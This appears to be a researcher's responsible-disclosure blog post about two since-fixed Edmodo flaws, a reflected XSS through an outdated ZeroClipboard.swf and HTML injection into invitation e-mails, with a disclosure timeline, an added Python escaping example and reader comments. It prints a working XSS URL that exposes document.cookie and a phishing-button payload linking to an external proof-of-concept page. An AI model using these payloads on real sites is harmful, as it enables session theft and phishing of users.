For those who don’t know Edmodo…
The safest and easiest way for educators to connect and collaborate with students, parents, and each other.
They have 59,411,899 members. Huge number.
I decided to help them by reporting two security issues: a reflected XSS and an HTML injection.
#1 Reflected XSS
After registering on Edmodo I noticed a request to ZeroClipboard.swf in the Chrome inspector.
I know that older versions of this SWF have an XSS vulnerability, so I gave it a try:
[code lang="html"]
https://www.edmodo.com/bin/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
[/code]
Guess what? It was a vulnerable version. It worked perfectly and my cookie was shown in a JavaScript alert box.
#2 HTML Injection on Create Invites
This one was interesting; I have already found similar issues on many other websites.
Using the invitee_first_name field you could inject HTML into the e-mail sent to the victim [invitee_email] and trick them.
Take for example this proof-of-concept:
[code lang="html"]
Ze<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>
[/code]
When sending a reminder you could also use the same technique:
[code lang="html"]
<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>
[/code]
This is reflected in the victim's e-mail. I used the same style as an existing Edmodo button, so when the victim clicked it they were taken to my proof-of-concept page.
Possible attack scenario:
- Malicious user sends invitations with an HTML injection [like my proof-of-concept]
- Victim thinks it’s a button from Edmodo and clicks on it.
- Victim’s browser gets hijacked
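As an added example (not code from the original post or from Edmodo), here is how the invitation template should output-encode the invitee name so the proof-of-concept above renders as inert text rather than a live button; the template, the URLs and the function names are assumptions, and the payload is constructed in the shape of the PoC.

```python
import html
import re

# Stand-in for the invitation e-mail template (assumption: Edmodo's real template is not public).
INVITE_TEMPLATE = (
    "<p>{first_name}, {inviter} invited you to join a group on Edmodo.</p>"
    '<a href="{accept_url}">Accept Invitation</a>'
)

# A person's name never legitimately contains tag or entity syntax, so its presence is worth logging.
MARKUP_RE = re.compile(r"<[A-Za-z/!]|&#?\w+;")


def looks_like_markup(value: str) -> bool:
    """Return True when a submitted field contains HTML tag or entity syntax."""
    return bool(MARKUP_RE.search(value))


def render_invite(first_name: str, inviter: str, accept_url: str, escape: bool = True) -> str:
    """Build the e-mail body. escape=False reproduces the vulnerable behaviour for comparison."""
    if escape:
        # Output-encode every user-controlled value at the point it enters HTML.
        first_name = html.escape(first_name, quote=True)
        inviter = html.escape(inviter, quote=True)
        accept_url = html.escape(accept_url, quote=True)
    return INVITE_TEMPLATE.format(first_name=first_name, inviter=inviter, accept_url=accept_url)


# Constructed payload in the shape of the post's proof of concept (attacker URL is a placeholder).
POC_NAME = (
    'Ze<br /><a href="http://attacker.invalid/poc" target="_blank">'
    "Accept Invitation and Win a Bonus</a>"
)


def live_anchor_count(body: str) -> int:
    """Count live anchor tags; the legitimate template contributes exactly one."""
    return body.count("<a ")


if __name__ == "__main__":
    accept = "https://example.invalid/accept"  # placeholder for the real accept link
    vulnerable = render_invite(POC_NAME, "Ms. Teacher", accept, escape=False)
    fixed = render_invite(POC_NAME, "Ms. Teacher", accept)
    print("markup in name:", looks_like_markup(POC_NAME))      # True
    print("anchors, unescaped:", live_anchor_count(vulnerable))  # 2: injected button is live
    print("anchors, escaped:", live_anchor_count(fixed))         # 1: only Edmodo's own button
```

Escaping at the template is the fix; the markup check is only a signal for logging or review, not a substitute for output encoding.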
The Edmodo guys were awesome, constantly giving updates on the report status. They also sent me some goodies, but European customs retained the package 🙂
Timeline:
13-10-2015 I sent an e-mail asking for a security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they were working on them
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure
Thanks for the article,
where is the invitee_first_name field and how did you inject it? Couldn’t see.
Regards
In the text field where you type the name of the user you want to invite to a group or something else.
Does Edmodo have a place to contact them about vulnerabilities? I’ve also found something and am wondering where to report it.
@Paltry_Digger – privacy at edmodo.com. Hope it helps!
Thanks! Just got my Edmodo mug and t-shirt for a stored XSS vulnerability 🙂
No worries. Edmodo are such cool guys 🙂